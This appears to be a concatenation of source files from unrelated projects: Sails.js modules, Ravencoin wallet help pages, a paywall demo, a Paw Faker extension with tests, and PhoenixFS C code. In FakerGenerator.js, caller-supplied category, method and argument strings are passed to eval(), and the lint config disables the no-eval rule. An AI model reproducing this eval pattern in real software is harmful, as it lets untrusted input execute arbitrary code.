#main_bar img{
vertical-align:middle;
}
#main_bar .sp_text{
color:white;
}
.clearLeft {
clear:left;
}
.tree-example {
padding:15px 0 0 0;
}
.tree-example img.animals {
float:left;
}
.tree-example table.animals {
margin-left:35px;
float:left;
}
.half {
width:50%;
float:left;
}
div.sphinxsidebar ul ul, div.sphinxsidebar ul.want-points {
word-wrap: break-word;
}
#sql-api .section {
border-bottom: 1px dashed black;
margin-bottom:5px;
}
#sql-api .section h2 {
font-size:1.2em;
} | ljubodrag/Baobab |
<|start_filename|>website/sidebars.js<|end_filename|>
module.exports = {
apiSidebar: {},
wikiSidebar: {
'Getting started': [
'wiki/installation',
'wiki/stub-generation',
'wiki/starting-server',
'wiki/basic-middleware',
],
Features: [
'wiki/middlewares',
'wiki/metadata',
'wiki/error-handling',
'wiki/caching',
'wiki/client',
],
},
}
<|start_filename|>typedoc.json<|end_filename|>
{
"inputFiles": ["./src/lib"],
"exclude": ["./src/lib/misc/*"],
"mode": "file",
"theme": "docusaurus2",
"plugin": "typedoc-plugin-markdown",
"readme": "none",
"stripInternal": true
}
| Cheerazar/protocat |
<|start_filename|>lib/hooks/http/middleware/load.js<|end_filename|>
/**
* Module dependencies
*/
var _ = require('lodash');
/**
* `use` middleware in the correct order.
*
* @param {express.app} app
* @param {Object} wares - dictionary of preconfigured middleware
* @param {sails.app} sails
*/
module.exports = function builtInMiddlewareLoader (app, wares, sails) {
_.each(sails.config.http.middleware.order, function (middlewareKey) {
// Special case:
// allows for injecting a custom function to attach middleware:
if (middlewareKey === '$custom' && sails.config.http.customMiddleware) {
sails.config.http.customMiddleware(app);
}
// Otherwise, just use the middleware normally.
if (wares[middlewareKey]) app.use(wares[middlewareKey]);
});
};
<|start_filename|>lib/hooks/orm/lookup-datastore.js<|end_filename|>
/**
* Module dependencies
*/
var Err = require('../../../errors');
// TODO: use this again so we get a normalized error
// (currently it's not being used anywhere)
/**
* Lookup a datastore/connection (e.g., `{ adapter: 'sails-disk' }`)
* by name (e.g., 'devDB')
*
* @param {String} connectionName
*
* @param {String} modelID
* // Optional, improves quality of error messages
*
* @global sails
* sails.config
* sails.config.connections {}
*
* @throws {Err.fatal} __UnknownConnection__
* @api private
*/
module.exports = function howto_lookupDatastore(sails){
return function lookupDatastore(connectionName, modelID) {
var connection = sails.config.connections[connectionName];
// If this is not a known connection, throw a fatal error.
if (!connection) {
return Err.fatal.__UnknownConnection__(connectionName, modelID);
}
return connection;
};
};
<|start_filename|>lib/app/private/toJSON.js<|end_filename|>
/**
* Module dependencies
*/
var util = require('util');
var _ = require('lodash');
/**
* [exports description]
* @return {[type]} [description]
*/
module.exports = function toJSON () {
return _.reduce(this, function (pojo, val, key) {
if (key === 'config') {
pojo[key] = val;
}
if (key === 'hooks') {
pojo[key] = _.reduce(val, function (memo, hook, ident) {
memo.push(ident);
return memo;
}, []);
}
if (key === 'models') {
pojo[key] = _.reduce(val, function (memo, model, ident) {
if (!model.junctionTable) {
memo.push({
attributes: model.attributes,
identity: model.identity,
globalId: model.globalId,
connection: model.connection,
schema: model.schema,
tableName: model.tableName
});
}
return memo;
}, []);
}
return pojo;
}, {});
};
<|start_filename|>lib/index.js<|end_filename|>
/**
* Module dependencies
*/
var Sails = require('./app');
// Instantiate and expose a Sails singleton
// (maintains legacy support)
module.exports = new Sails();
// Expose constructor for convenience/tests
module.exports.Sails = Sails;
// To access the Sails app constructor, do:
// var Sails = require('sails').constructor;
// var newApp = new Sails();
// Or to get a factory method which generates new instances:
// var Sails = require('sails/lib/app');
// var newApp = Sails();
<|start_filename|>lib/app/private/after.js<|end_filename|>
/**
* Module dependencies
*/
var _ = require('lodash');
var async = require('async');
//
// TODO
// Pull this into a separate module, since it's not specific to Sails.
//
/**
* Mix-in an `after` function to an EventEmitter.
*
* If `events` have already fired, trigger fn immediately (with no args)
* Otherwise bind a normal one-time event using `EventEmitter.prototype.once()`.
* Useful for checking whether or not something has finished loading, etc.
*
* This is a lot like jQuery's `$(document).ready()`.
*
* @param {EventEmitter} emitter
*/
module.exports = function mixinAfter(emitter) {
/**
* { emitter.warmEvents }
*
* Events which have occurred at least once
* (Required to support `emitter.after()`)
*/
emitter.warmEvents = {};
/**
* emitter.emit()
*
* Override `EventEmitter.prototype.emit`.
* (Required to support `emitter.after()`)
*/
var _emit = _.clone(emitter.emit);
emitter.emit = function(evName) {
var args = Array.prototype.slice.call(arguments, 0);
emitter.warmEvents[evName] = true;
_emit.apply(emitter, args);
};
/**
* `emitter.after()`
*
* Fires your handler **IF THE SPECIFIED EVENT HAS ALREADY BEEN TRIGGERED** or **WHEN IT IS TRIGGERED**.
*
* @param {String|Array} events [name of the event(s)]
* @param {Function} fn [event handler function]
* @context {Sails}
*/
emitter.after = function(events, fn) {
// Support a single event or an array of events
if (!_.isArray(events)) {
events = [events];
}
// Convert named event dependencies into an array
// of async-compatible functions.
var dependencies = _.reduce(events,
function(dependencies, event) {
var handlerFn = function(cb) {
if (emitter.warmEvents[event]) {
cb();
} else {
emitter.once(event, cb);
}
};
dependencies.push(handlerFn);
return dependencies;
}, []);
// When all events have fired, call `fn`
// (all arguments passed to `emit()` calls are discarded)
async.parallel(dependencies, function(err) {
if (err) sails.log.error(err);
return fn();
});
};
};
<|start_filename|>lib/hooks/blueprints/onRoute.js<|end_filename|>
/**
* Module dependencies.
*/
var _ = require('lodash'),
util = require('sails-util');
// NOTE:
// Since controllers load blueprint actions by default anyways, this route syntax handler
// can be replaced with `{action: 'find'}, {action: 'create'}, ...` etc.
/**
* Expose route parser.
* @type {Function}
*/
module.exports = function (sails) {
return interpretRouteSyntax;
/**
* interpretRouteSyntax
*
* "Teach" router to understand direct references to blueprints
* as a target to sails.router.bind()
* (i.e. in the `routes.js` file)
*
* @param {[type]} route [description]
* @return {[type]} [description]
* @api private
*/
function interpretRouteSyntax (route) {
var target = route.target,
path = route.path,
verb = route.verb,
options = route.options;
// Support referencing blueprints in explicit routes
// (`{ blueprint: 'create' }` et. al.)
if (
_.isObject(target) &&
!_.isFunction(target) &&
!_.isArray(target) &&
_.isString(target.blueprint)) {
// On a match, merge leftover items in the target object into route options:
options = _.merge(options, _.omit(target, 'blueprint'));
return bindBlueprintAction(path, target.blueprint, verb, options);
}
// Ignore unknown route syntax
// If it needs to be understood by another hook, the hook would have also received
// the typeUnknown event, so we're done.
return;
}
/**
* Bind explicit route to a blueprint action.
*
* @param {[type]} path [description]
* @param {[type]} blueprintActionID [description]
* @param {[type]} verb [description]
* @param {[type]} options [description]
* @return {[type]} [description]
* @api private
*/
function bindBlueprintAction ( path, blueprintActionID, verb, options ) {
// Look up appropriate blueprint action and make sure it exists
var blueprint = sails.middleware.blueprints[blueprintActionID];
// If a 'blueprint' was specified, but it doesn't exist, warn the user and ignore it.
if ( ! ( blueprint && _.isFunction(blueprint) )) {
sails.log.error(
blueprintActionID,
':: Ignoring attempt to bind route (' + path + ') to unknown blueprint action (`'+blueprintActionID+'`).'
);
return;
}
// If a model wasn't provided with the options, try and guess it
if (!options.model) {
var matches = path.match(/^\/(\w+).*$/);
if (matches && matches[1] && sails.models[matches[1]]) {
options.model = matches[1];
}
else {
sails.log.error(
blueprintActionID,
':: Ignoring attempt to bind route (' + path + ') to blueprint action (`'+blueprintActionID+'`), but no valid model was specified and we couldn\'t guess one based on the path.'
);
return;
}
}
// If associations weren't provided with the options, try and get them
if (!options.associations) {
options = _.merge({ associations: _.cloneDeep(sails.models[options.model].associations) }, options);
}
// Otherwise make sure it's an array of strings of valid association aliases
else {
options.associations = options.associations.map(function(alias) {
if (typeof(alias) != 'string') {
sails.log.error(
blueprintActionID,
':: Ignoring invalid association option for '+path+'.'
);
return;
}
var association;
if (!(association = _.findWhere(sails.models[options.model].associations, {alias: alias}))) {
sails.log.error(
blueprintActionID,
':: Ignoring invalid association option `'+alias+'` for '+path+'.'
);
return;
}
return association;
});
}
// If "populate" wasn't provided in the options, use the default
if (typeof (options.populate) == 'undefined') {
options.populate = sails.config.blueprints.populate;
}
sails.router.bind(path, blueprint, verb, options);
return;
}
};
| kevinburke/sails |
<|start_filename|>mobilewallet/support/security/fingerprint.html<|end_filename|>
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>What is fingerprint authentication?</title>
<link href="../css/style.css" rel="stylesheet" type="text/css">
<!--Template Stylesheet-->
<link href="css/elements-style.css" rel="stylesheet" type="text/css">
<!--Template Elements Stylesheet-->
<link href="css/font-awesome.css" rel="stylesheet">
<!-- Font Awesome v5 -->
<link href="https://fonts.googleapis.com/css?family=Questrial" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Poppins" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.2/modernizr.js"></script>
</head>
<style type="text/css">
h3 {
font-family: 'Poppins', sans-serif;
font-size: 16px;
font-weight: 900;
color: #ff784c; margin-top: 1em;
margin-bottom: 1em; }
</style>
<body>
<div class="se-pre-con"></div>
<!-- start Site Header -->
<header class="site-header">
<div class="wrapper">
<!-- start site logo-->
<div class="site-logo">
<a href="index.html"><img style="max-width: 30px;/* margin-right: 127px; */" src="../images/back.svg"></a>
<a href=""><img style=" margin-left: 80px; " src="../images/RVN@3x.png" alt="logo"> </a>
</div>
</div>
<!-- end wrapper -->
</header>
<!-- end site header -->
<!-- Site Content -->
<div class="content main-container" id="site-content">
<!-- start wrapper -->
<div class="wrapper">
<!-- start featured box -->
<div class="featured-box">
<div class="container">
<div class="row">
<div class="col">
<h3>What is fingerprint authentication? </h3>
</div>
</div>
<p>Touch ID on iPhone
Touch ID is available on any iPhone 5s or later, iPad Pro, iPad Air 2, or iPad mini 3 or later. If you have it enabled on your device, you can use your fingerprint to unlock your RVN Wallet and authorize transactions instead of entering your passcode. You will still be required to enter your passcode periodically for increased security.<br />
If Touch ID is not enabled on your device, you can enable it in your device's settings under "Touch ID & Passcode".<br />
<br />Fingerprint Authorization on Android<br />
Many Android devices feature a fingerprint reader. You can use your fingerprint to unlock your RVN Wallet and authorize transactions instead of entering your passcode. You will still be required to enter your passcode periodically for increased security.<br />
In order to use this feature in the RVN Wallet, fingerprint authorization must be enabled on your device. See the phone manufacturer's manual for more information.<br />
<br />What is the fingerprint/touch ID spending limit?<br />
The Touch ID option in the RVN Wallet’s Security Center allows you to conveniently unlock your RVN Wallet and send money up to a set limit using your fingerprint.<br />
Security experts have proved it is possible to lift fingerprints from a stolen device and use them to trick that device's fingerprint reader into unlocking the device, thus this is not a strong security solution.<br />
To ensure the majority of your funds are safe in the event your phone is stolen, the RVN Wallet sets a limit to the amount of money that can be sent with only a fingerprint. If you or anyone else tries to send more than that limit (accumulative), your wallet passcode will be required.<br />
You can change the limit by choosing Fingerprint Authorization Limit in the RVN Wallet settings.<br />
NOTE: Before enabling this in the RVN Wallet, make sure that you have enabled Touch ID in your iOS device settings or the Fingerprint Authorization on your Android device. Review your phone manufacturer’s manual for more information on this.<br />
If Touch ID or Fingerprint Authorization has been enabled on your device settings, follow these steps to enable Touch ID in the RVN Wallet:<br />
<br />Tap on Menu in the main screen.<br />
Select Security Settings.<br />
Choose Touch ID.<br />
Tap the switch button to enable Touch ID for RVN Wallet.<br />
Tap on the link for Touch ID Spending Limit Screen.<br />
Enter your PIN.<br />
Select from one of the limit options provided on the screen. When done, tap the arrow in the top left to return to the settings menu.
</p>
</p>
</div>
</div>
</div>
<!-- start site footer -->
<footer class="site-footer">
<div class="wrapper">
<!-- start site footer bottom -->
<div class="site-footer-bottom">
<p>Please review our <br /> <a href="https://ravencoin.org/mobilewallet/support/terms.html">Terms of Use </a> - <a href="https://ravencoin.org/mobilewallet/support/privacy.html">Privacy Policy</a></p>
</div>
<!-- end site footer bottom-->
</div>
<!--wrapper-->
</footer>
</body>
<!-- end site footer -->
<script type="text/javascript"> $(window).load(function() {
// Animate loader off screen
$(".se-pre-con").fadeOut("slow");;
});
</script>
</html>
<|start_filename|>mobilewallet/support/Troubleshooting/Insufficient-funds.html<|end_filename|>
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Why is my Ravencoin transaction missing?</title>
<link href="../css/style.css" rel="stylesheet" type="text/css">
<!--Template Stylesheet-->
<link href="css/elements-style.css" rel="stylesheet" type="text/css">
<!--Template Elements Stylesheet-->
<link href="css/font-awesome.css" rel="stylesheet">
<!-- Font Awesome v5 -->
<link href="https://fonts.googleapis.com/css?family=Questrial" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Poppins" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.2/modernizr.js"></script>
</head>
<style type="text/css">
h3 {
font-family: 'Poppins', sans-serif;
font-size: 16px;
font-weight: 900;
color: #ff784c; margin-top: 1em;
margin-bottom: 1em; }
</style>
<body>
<div class="se-pre-con"></div>
<!-- start Site Header -->
<header class="site-header">
<div class="wrapper">
<!-- start site logo-->
<div class="site-logo">
<a href="index.html"><img style="max-width: 30px;/* margin-right: 127px; */" src="../images/back.svg"></a>
<a href=""><img style=" margin-left: 80px; " src="../images/RVN@3x.png" alt="logo"> </a>
</div>
</div>
<!-- end wrapper -->
</header>
<!-- end site header -->
<!-- Site Content -->
<div class="content main-container" id="site-content">
<!-- start wrapper -->
<div class="wrapper">
<!-- start featured box -->
<div class="featured-box">
<div class="container">
<div class="row">
<div class="col">
<h3>Why is my Ravencoin transaction missing?</h3>
</div>
</div>
<p>The RVN Wallet does not charge any fees to send a transaction. However, the Ravencoin network requires a "transaction fee". The cost of this fee varies as the price of the Ravencoin changes and the congestion on the network increases.
When sending a transaction, you need to make sure that you have enough funds in your wallet to cover the necessary transaction fee. Otherwise, an “Insufficient funds” error occurs.
When sending Ravencoin, fees are not calculated by the amount of money you are sending but rather by the amount of data attached to your transaction. On top of the amount being sent, this data will include information about where the funds came from and where it is being sent to.
If you are sending funds that came from several smaller transactions sent to your wallet, all of the information from those smaller transactions need to be referenced in the new transaction. This increases the data size of the new transaction and may cause the fee to be multiplied several times depending on how large the data size is. Sending a smaller transaction may help in this case. Also, if you receive small transactions regularly, you may want to arrange for larger and less frequent payments instead.
</p>
</div>
</div>
</div>
<!-- start site footer -->
<footer class="site-footer">
<div class="wrapper">
<!-- start site footer bottom -->
<div class="site-footer-bottom">
<p>Please review our <br /> <a href="https://ravencoin.org/mobilewallet/support/terms.html">Terms of Use </a> - <a href="https://ravencoin.org/mobilewallet/support/privacy.html">Privacy Policy</a></p>
</div>
<!-- end site footer bottom-->
</div>
<!--wrapper-->
</footer>
</body>
<!-- end site footer -->
<script type="text/javascript"> $(window).load(function() {
// Animate loader off screen
$(".se-pre-con").fadeOut("slow");;
});
</script>
</html> | muhammad-05/ravenproject.github.io |
<|start_filename|>server/stripe/stripe.js<|end_filename|>
console.log('Hello Nodejs with Lambda');
<|start_filename|>src/index-old.html<|end_filename|>
<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=5.0">
<title>Stencil Component Starter</title>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://unpkg.com/@ionic/core@0.1.4-9/dist/ionic.js"></script>
<script src="/build/open-paywall.js"></script>
</head>
<body>
<ion-header class="header">
<ion-title>Hipster Secrets</ion-title>
<ion-header>
<ion-card class="blog-post">
<ion-card-header><h2>Espresso? Nespresso?</h2></ion-card-header>
<ion-card-content>
<p>Iceland woke cardigan freegan quinoa crucifix art party portland scenester seitan vape trust fund paleo succulents. Vice taiyaki lyft, venmo chillwave kale chips vegan drinking vinegar single-origin coffee fanny pack bespoke enamel pin meh fam.</p>
</ion-card-content>
</ion-card>
<ion-card class="blog-post">
<ion-card-header><h2>Vinyl or Cassette? Our Beanie Expert Tells All!</h2></ion-card-header>
<ion-card-content>
<open-paywall provider="stripe" access-token="<KEY>" cost="1025">
<div class="premium-content"><p>Lorem ipsum dolor amet plaid meh cornhole squid. Tousled small batch dreamcatcher PBR&B, truffaut mixtape tilde unicorn forage snackwave plaid quinoa four dollar toast cliche. Meditation sriracha pabst crucifix normcore readymade listicle. Paleo listicle locavore actually sriracha direct trade kitsch offal, vinyl chicharrones cred.
</p><p>
Tumeric ugh poke yuccie, waistcoat kogi activated charcoal letterpress. Letterpress shoreditch four loko yr bespoke typewriter. Green juice fashion axe man bun cloud bread four loko, pok pok food truck ramps gluten-free cardigan lomo. Sustainable food truck umami you probably haven't heard of them tattooed viral deep v waistcoat polaroid vaporware listicle authentic pop-up.
</p><p>
Crucifix bespoke cardigan small batch heirloom deep v occupy migas irony pop-up you probably haven't heard of them enamel pin chartreuse retro marfa. Marfa vice godard shaman, squid umami paleo unicorn quinoa glossier. Mumblecore bespoke gluten-free fam, adaptogen shoreditch farm-to-table authentic sriracha shabby chic lumbersexual humblebrag distillery kale chips glossier. Crucifix tilde tofu kinfolk disrupt sustainable. Wolf woke glossier tote bag tattooed, twee franzen deep v. Before they sold out ugh umami meditation wolf.
</p><p>
Kitsch letterpress photo booth flannel poke, prism franzen messenger bag umami. Craft beer tofu iPhone offal paleo four loko heirloom typewriter brunch. Pabst PBR&B green juice deep v ennui swag 8-bit venmo ethical umami raw denim. Meh bitters cold-pressed keytar chicharrones, VHS hexagon. Biodiesel echo park health goth chicharrones street art, bespoke iPhone trust fund vegan. Bitters ramps kogi, schlitz butcher cray squid air plant gastropub austin whatever normcore neutra artisan prism. Humblebrag iceland jianbing, crucifix gastropub air plant venmo edison bulb vape tattooed messenger bag +1.
</p><p>
Oh. You need a little dummy text for your mockup? How quaint.
</p><p>
I bet you’re still using Bootstrap too…</p></div>
</open-paywall>
</ion-card-content>
</ion-card>
</body>
<style>
</style>
<script>
document.addEventListener('paymentMade', (event) => {
document.querySelector('.premium-content').style.filter = "none";
console.log('Payment Made', event);
});
</script>
</html>
| secretshardul/open-paywall |
<|start_filename|>src/FakerGenerator.js<|end_filename|>
import faker from 'faker';
export default class FakerGenerator {
constructor(locale, category, method, args) {
this.category = category;
this.method = method;
this.args = args;
this.faker = faker;
this.faker.locale = locale;
}
generate() {
if (
typeof this.faker[this.category] !== 'undefined'
&& typeof this.faker[this.category][this.method] !== 'undefined'
) {
return eval(`this.faker.${this.category}.${this.method}(${this.args});`);
}
return '';
}
}
<|start_filename|>Makefile<|end_filename|>
.DEFAULT_GOAL := help
.PHONY: build test
.SILENT:
YELLOW := $(shell tput -Txterm setaf 3)
RESET := $(shell tput -Txterm sgr0)
identifier = com.rebelinblue.PawExtensions.FakerDynamicValue
extensions_dir = $(HOME)/Library/Containers/com.luckymarmot.Paw/Data/Library/Application Support/com.luckymarmot.Paw/Extensions/
## Build the extension
build:
npm install
npm run build
cp README.md LICENSE.md ./build/$(identifier)/
## Clean up the build directory
clean:
rm -Rf ./build/
## Install the extension
install: clean build
mkdir -p "$(extensions_dir)$(identifier)/"
cp -r ./build/$(identifier)/* "$(extensions_dir)$(identifier)/"
## Run tests
test:
npm run test
## Run eslint
lint:
npm run lint
## Generate code coverage
coverage:
npm run test:coverage
## Create an archive for the extension
archive:
ifndef TRAVIS_TAG
cd ./build/; zip -r FakerDynamicValue.zip "$(identifier)/"
else
cd ./build/; zip -r FakerDynamicValue-$(TRAVIS_TAG).zip "$(identifier)/"
endif
## Prints this help
help:
@echo "\nUsage: make ${YELLOW}<target>${RESET}\n\nThe following targets are available:\n";
@awk -v skip=1 \
'/^##/ { sub(/^[#[:blank:]]*/, "", $$0); doc_h=$$0; doc=""; skip=0; next } \
skip { next } \
/^#/ { doc=doc "\n" substr($$0, 2); next } \
/:/ { sub(/:.*/, "", $$0); printf "\033[34m%-30s\033[0m\033[1m%s\033[0m %s\n", $$0, doc_h, doc; skip=1 }' \
$(MAKEFILE_LIST)
<|start_filename|>.eslintrc.js<|end_filename|>
module.exports = {
extends: 'airbnb-base',
parser: 'babel-eslint',
parserOptions: {
ecmaVersion: 2017
},
rules: {
'func-names': ['error', 'never'],
'no-confusing-arrow': [0],
'max-len': ['error', 120],
'no-eval': [0]
},
env: {
node: true,
mocha: true
}
};
<|start_filename|>test/FakerGenerator.spec.js<|end_filename|>
import { use, expect } from 'chai';
import dirtyChai from 'dirty-chai';
import FakerGenerator from '../src/FakerGenerator';
use(dirtyChai);
describe('FakerGenerator', () => {
it('Returns an empty string if the category is invalid', () => {
const generator = new FakerGenerator('en', 'invalid');
const result = generator.generate();
expect(result).to.be.empty();
});
it('Returns an empty string if the category is valid but the method is invalid', () => {
const generator = new FakerGenerator('en', 'internet', 'invalid');
const result = generator.generate();
expect(result).to.be.empty();
});
// FIXME: This should use a spy rather than use the real class
it('Calls faker', () => {
const generator = new FakerGenerator('en', 'random', 'boolean');
const result = generator.generate();
expect(result).to.be.a('boolean');
});
// FIXME: This should use a spy rather than use the real class
it('Passes the arguments to faker', () => {
const generator = new FakerGenerator('en', 'random', 'number', '{ min: 10, max: 10 }');
const result = generator.generate();
expect(result).to.be.equal(10);
});
});
<|start_filename|>.mocharc.js<|end_filename|>
module.exports = {
require: '@babel/register',
recursive: true,
reporter: 'spec'
}
<|start_filename|>webpack.config.babel.js<|end_filename|>
import path from 'path';
import UglifyPlugin from 'uglifyjs-webpack-plugin';
const production = (process.env.NODE_ENV === 'production');
module.exports = {
mode: production ? 'production' : 'development',
target: 'web',
entry: [
'faker',
'./src/FakerDynamicValue.js',
],
output: {
path: path.join(
__dirname,
'./build/com.rebelinblue.PawExtensions.FakerDynamicValue',
),
publicPath: '/build/',
filename: 'FakerDynamicValue.js',
},
module: {
rules: [{
test: /\.js?$/,
exclude: /(node_modules|bower_components)/,
use: {
loader: 'babel-loader',
},
}],
},
plugins: production ? [
new UglifyPlugin({
uglifyOptions: { warnings: false },
}),
] : [],
};
<|start_filename|>test/FakerDynamicValue.spec.js<|end_filename|>
import { use, expect } from 'chai';
import dirtyChai from 'dirty-chai';
import FakerDynamicValue from '../src/FakerDynamicValue';
use(dirtyChai);
describe('FakerDynamicValue', () => {
let dynamicValues;
beforeEach(() => {
dynamicValues = new FakerDynamicValue();
});
it('Should return the title', () => {
expect(dynamicValues.title()).to.be.equal(FakerDynamicValue.title);
});
it('Should return empty text when no method or category are set', () => {
expect(dynamicValues.text()).to.be.empty();
});
it('Should return empty text when no method is set', () => {
dynamicValues.category = 'internet';
expect(dynamicValues.text()).to.be.empty();
});
it('Should return empty text when no category is set', () => {
dynamicValues.method = 'password';
expect(dynamicValues.text()).to.be.empty();
});
it('Should return return the category and method when both are set', () => {
dynamicValues.category = 'internet';
dynamicValues.method = 'password';
expect(dynamicValues.text()).to.be.equal('internet.password()');
});
it('Should return return the category and method with options when all are set', () => {
dynamicValues.category = 'internet';
dynamicValues.method = 'password';
dynamicValues.options = '15, true';
expect(dynamicValues.text()).to.be.equal('internet.password(15, true)');
});
// FIXME: This should use a spy rather than use the real class as now we are
// testing something outside the scope of this test
it('Should call the FakerGenerator', () => {
dynamicValues.locale = 'en';
dynamicValues.category = 'random';
dynamicValues.method = 'number';
dynamicValues.options = '{ min: 10, max: 10 }';
const result = dynamicValues.evaluate();
expect(result).to.be.equal(10);
});
});
| bymost/Paw-FakerDynamicValue |
<|start_filename|>envs/checkpoints/space_shooter/params.json<|end_filename|>
{
"batch_mode": "truncate_episodes",
"clip_param": 0.2,
"entropy_coeff": 0.0001,
"entropy_coeff_schedule": null,
"env": "godot",
"env_config": {
"action_repeat": null,
"env_path": "envs/example_envs/builds/SpaceShooter/space_shooter.x86_64",
"framerate": null,
"seed": 0,
"show_window": false
},
"framework": "torch",
"gamma": 0.99,
"lambda": 0.95,
"lr": 0.0003,
"model": {
"fcnet_hiddens": [
32,
32
],
"lstm_cell_size": 32,
"num_framestacks": 4,
"use_lstm": false
},
"no_done_at_end": true,
"num_envs_per_worker": 16,
"num_gpus": 1,
"num_sgd_iter": 16,
"num_workers": 4,
"rollout_fragment_length": 32,
"sgd_minibatch_size": 1024,
"soft_horizon": true,
"train_batch_size": 8192,
"vf_clip_param": 1.0
} | r0nk/godot_rl_agents |
<|start_filename|>delta.h<|end_filename|>
#ifndef DELTA_H_
#define DELTA_H_
#include "common.h"
#define HASH_LIMIT 64
#define RABIN_SHIFT 23
#define RABIN_WINDOW 16
#define DELTA_SIZE_MIN 4
/*
* The maximum size for any opcode sequence, including the initial header
* plus Rabin window plus biggest copy.
*/
#define MAX_OP_SIZE (5 + 5 + 1 + RABIN_WINDOW + 7)
struct index_entry {
const unsigned char *ptr;
unsigned int val;
};
struct unpacked_index_entry {
struct index_entry entry;
struct unpacked_index_entry *next;
};
struct delta_index {
unsigned long memsize;
const void *src_buf;
unsigned long src_size;
unsigned int hash_mask;
struct index_entry *hash[0];
};
void *diff_delta(const void *src_buf, unsigned long src_bufsize,
const void *trg_buf, unsigned long trg_bufsize,
unsigned long *delta_size, unsigned long max_delta_size);
void *patch_delta(const void *src_buf, unsigned long src_size,
const void *delta_buf, unsigned long delta_size,
unsigned long *dst_size);
#endif
<|start_filename|>t/test-pack.c<|end_filename|>
#include "pack.h"
#include <stdio.h>
#include <string.h>
static void usage(const char *progname)
{
die("Usage: %s <packfile> <packfile.idx> <sha1>", progname);
}
int main(int argc, char* argv[])
{
unsigned char sha1[20];
if (argc < 4)
usage(argv[0]);
load_packing_info(argv[1], argv[2], true);
get_sha1_hex(argv[3], sha1);
return unpack_entry(sha1, ".");
}
<|start_filename|>t/test-diff.c<|end_filename|>
#include "diff.h"
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
static void usage(const char *progname)
{
die("Usage: %s <file1> <file2> [outfile]", progname);
}
int main(int argc, char* argv[])
{
FILE *file1, *file2, *outfile;
size_t sz1, sz2;
struct stat st1, st2;
if (argc < 3)
usage(argv[0]);
if (stat(argv[1], &st1))
die("Could not stat %s", argv[1]);
if (!(file1 = fopen(argv[1], "rb")))
die("Could not open %s", argv[1]);
sz1 = (size_t)(st1.st_size);
if (stat(argv[2], &st2))
die("Could not stat %s", argv[2]);
if (!(file2 = fopen(argv[2], "rb")))
die("Could not open %s", argv[2]);
sz2 = (size_t)(st2.st_size);
outfile = stdout;
if (argc > 3) {
if (!(outfile = fopen(argv[3], "w")))
die("Could not open %s", argv[3]);
}
phoenixfs_diff(file1, sz1, file2, sz2, outfile);
fclose(file1);
fclose(file2);
if (outfile)
fclose(outfile);
return 0;
}
<|start_filename|>diff.h<|end_filename|>
#ifndef DIFF_H_
#define DIFF_H_
#include <stdio.h>
#include "common.h"
#include "xdiff/xdiff.h"
int xdl_diff(mmfile_t *mf1, mmfile_t *mf2, xpparam_t const *xpp,
xdemitconf_t const *xecfg, xdemitcb_t *ecb);
int phoenixfs_diff(FILE* file1, size_t sz1, FILE* file2, size_t sz2, FILE* outfile);
#endif
<|start_filename|>t/test-compress.c<|end_filename|>
#include "compress.h"
#include <string.h>
#include <stdio.h>
#include <zlib.h>
#include <errno.h>
int main(int argc, char* argv[])
{
FILE *src;
if (argc < 3)
die("Usage: %s <i|d> <filename>", argv[0]);
if (!(src = fopen(argv[2], "rb")))
return -errno;
if (!strcmp(argv[1], "i"))
zinflate(src, stdout);
else if (!strcmp(argv[1], "d"))
zdeflate(src, stdout, -1);
else
die("Usage: %s <i|d> <filename>", argv[0]);
fclose(src);
return 0;
}
<|start_filename|>common.h<|end_filename|>
#ifndef COMMON_H_
#define COMMON_H_
#if 1
#define PHOENIXFS_DBG(f, ...) \
{ \
FILE *logfh = fopen("/tmp/phoenixfs.log", "a"); \
if (logfh) { \
fprintf(logfh, "l. %4d: " f "\n", __LINE__, ##__VA_ARGS__); \
fclose(logfh); \
} \
}
#else
#define PHOENIXFS_DBG(f, ...) while(0)
#endif
void die(const char *err, ...);
#endif
<|start_filename|>main.h<|end_filename|>
#ifndef MAIN_H_
#define MAIN_H_
#include <time.h>
#include <stdio.h>
#include "common.h"
#include "buffer.h"
#include "diff.h"
#define DATE_LEN 26
enum subcmd {
SUBCMD_NONE,
SUBCMD_MOUNT,
SUBCMD_LOG,
SUBCMD_DIFF,
};
int phoenixfs_fuse(int argc, char *argv[]);
#endif
<|start_filename|>persist.c<|end_filename|>
#include "persist.h"
#include <stdint.h>
#include <stdio.h>
#include <string.h>
unsigned char path_buf[PATH_MAX] = "\0";
/* --------------
* The dump part
* --------------
*/
/**
* Format:
* <> :=
* (struct file_record)
*/
static void dump_frs(struct vfile_record *vfr, uint8_t start_rev,
uint8_t rev_nr, FILE *outfile)
{
while (start_rev < rev_nr) {
fwrite(vfr->history[start_rev],
sizeof(struct file_record), 1, outfile);
free(vfr->history[start_rev]);
PHOENIXFS_DBG("dump_frs:: %s [%u]", vfr->name, start_rev);
start_rev = (start_rev + 1) % REV_TRUNCATE;
}
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | rev_nr | [<dump_frs>][...]][...]
*/
static void dump_vfr_tree(struct node *root, FILE *outfile)
{
struct vfile_record *vfr;
uint8_t start_rev, rev_nr;
uint16_t name_len;
int num_keys = 0;
int i = 0;
node *iter;
if (!(iter = root)) {
/* Write num_keys = 0 */
fwrite(&i, sizeof(uint16_t), 1, outfile);
return;
}
/* First compute and write the number of keys */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++)
num_keys++;
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
